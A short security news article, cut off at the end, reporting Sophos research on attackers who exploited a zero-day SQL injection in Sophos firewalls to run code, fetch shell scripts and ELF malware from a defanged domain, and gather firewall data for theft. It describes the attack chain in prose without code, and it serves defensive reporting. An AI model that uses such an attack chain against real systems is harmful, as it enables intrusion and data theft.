British security firm Sophos determined that malicious actors had abused a zero-day vulnerability to achieve remote code execution (RCE) on some of its firewall products.

According to Sophos, the attack chain began when digital attackers exploited a zero-day SQL injection vulnerability to achieve RCE on some firewall products. They abused this privilege to insert a command into a database table that instructed an infected firewall device to download a Linux shell script from a remote server hosted at the malicious site “sophosfirewallupdate[.]com.” This script then dropped additional files to lay the move the attack forward.

One of those resources was .lp.sh. This shell script was responsible for connecting to “sophosfirewallupdate[.]com” and downloading a Linux ELF executable file that was capable on running on the firewall’s operating system. A second shell script performed similar functionality by downloading a different Linux ELF executable and writing it to the file system.

At the same time, the installer script ran a Postgres SQL command that modified an existing shell script in the firewall’s operating system.

These files all brought the infection chain to a point where the campaign could download a file known as “Sophos.dat.” Sophos took a close look at this payload and discovered its true purpose. As it explained in its research:

This malware’s primary task appeared to be data theft, which it could perform by retrieving the contents of various database tables stored in the firewall, as well as by running some operating system commands. At each step, the malware collected information and then concatenated it to a file it stored temporarily on the firewall with the name Info.xg.

A view of the malware’s data exfiltration chain (Source: Sophos)

As a result of its investigation into the attack described above, Sophos added all (Read more...)